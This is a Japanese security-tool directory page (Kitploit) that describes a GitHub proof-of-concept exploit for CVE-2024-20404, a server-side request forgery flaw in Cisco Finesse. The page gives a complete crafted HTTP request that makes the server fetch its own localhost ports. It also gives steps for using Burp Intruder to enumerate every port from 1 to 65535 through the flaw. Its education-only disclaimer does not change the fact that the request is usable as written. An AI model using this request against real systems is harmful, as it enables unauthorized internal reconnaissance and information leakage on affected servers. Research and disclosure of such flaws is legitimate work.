Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/3zz4t/cve-2024-20404
偵察脆弱性分析エクスプロイト情報収集ウェブセキュリティペネトレーションテスト
GitHub3zz4t/cve-2024-20404

CVE-2024-20404

CVE-2024-20404の概念実証エクスプロイトで、Cisco FinesseのWebベース管理インターフェースにおけるSSRFを実証し、内部ポートの列挙と限定的な情報漏洩を可能にします。

リポジトリを見る
212年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
CVE-2024-20404 — CVE-2024-20404の概念実証エクスプロイトで、Cisco FinesseのWebベース管理インターフェースにおけるSSRFを実証し、内部ポートの列挙と限定的な情報漏洩を可能にします。 | Kitploit

説明

Cisco Finesse の Web ベース管理インターフェースの脆弱性により、認証されていないリモートの攻撃者が影響を受けるシステムに対して SSRF 攻撃を実行できる可能性があります。

この脆弱性は、影響を受けるシステムに送信される特定の HTTP リクエストに対して、ユーザーが提供する入力の検証が不十分であることに起因します。攻撃者は、細工された HTTP リクエストを影響を受けるデバイスに送信することで、この脆弱性を悪用する可能性があります。悪用に成功すると、攻撃者は影響を受けるデバイスに関連付けられたサービスの限定的な機密情報を取得できる可能性があります。

概念実証 (PoC)

  1. 以下のリクエストを送信し、<target> を実際のものに置き換えた後、サーバーの localhost のポート番号「8444」からの応答を確認します。
root@kitploit:~
POST /gadgets/metadata HTTP/2
Host: <target>:8445
Cookie: timeBeforeFailover=1695808242310; timeBeforeAttemptingLoginInIframe=1695808244317; attemptsMade=1; seqNumberGenerated=1; finesse_ag_extension=<extension>; activeDeviceId4000=SEPD4AD717A03F6; timeBeforeLoadingOtherSide=1695808249678
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<target>:8445/desktop/container;jsessionid=90aE172355707490406528141464742B/?locale=en_US
Content-Type: application/json
Content-Length: 127
Origin: https://<target>:8445
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"context":{"container":"default","language":"en","country":"US","locale":"en_US"},"gadgets":[{"url":"http://127.0.0.1:8444"}]}

  1. Burp Suite Intruder を使用して、Cisco Finesse Web ベース管理サーバーのすべてのオープンポートを、ポート番号 1 から 65535 まで変更してスキャンします。

  2. クローズされたポートでは、「Connection refused」応答が表示されます。

  1. その他のエラーメッセージは、これらのポートがオープンであり、列挙可能であることを示しています。

参考文献

  • https://nvd.nist.gov/vuln/detail/CVE-2024-20404
  • https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-finesse-ssrf-rfi-Um7wT8Ew

免責事項

これは、Cisco Finesse Web ベース管理インターフェースが Server Side Request Forgery (SSRF) に対して脆弱であることを示すための概念実証 (PoC) であり、教育目的のみを意図しています。責任を持って、テストする明示的な許可があるシステムでのみ使用してください。この PoC を誤用すると、深刻な結果を招く可能性があります。

ツールをダウンロード